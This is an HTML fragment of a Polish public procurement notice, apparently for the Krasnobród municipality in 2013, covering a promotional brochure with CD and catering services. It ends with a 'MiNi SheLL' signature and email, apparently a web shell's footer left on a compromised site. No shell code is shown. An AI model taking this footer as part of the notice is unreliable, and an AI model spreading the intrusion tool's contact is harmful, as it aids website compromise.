<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6, 79.82.30.00-9, 79.97.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wydanie broszury z płytą kompaktową promującą projekt: Zintegrowany system gospodarki odpadami Gminy Krasnobród..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres części zamówienia: (wydruk broszury 400 sztuk, wytłoczenie płyt CD -400 sztuk).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.97.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usługi gastronomiczne kateringowe związane z promocją projektów:
1. Rozbudowa Infrastruktury turystycznej w Krasnobrodzie etap II.
2. Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres części zamówienia: (Organizacja stołu szwedzkiego dla 40 osób, organizacja stołu szwedzkiego na 50 osob, posiłki regeneracyjne dla wolontariuszy 46 zestawów).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com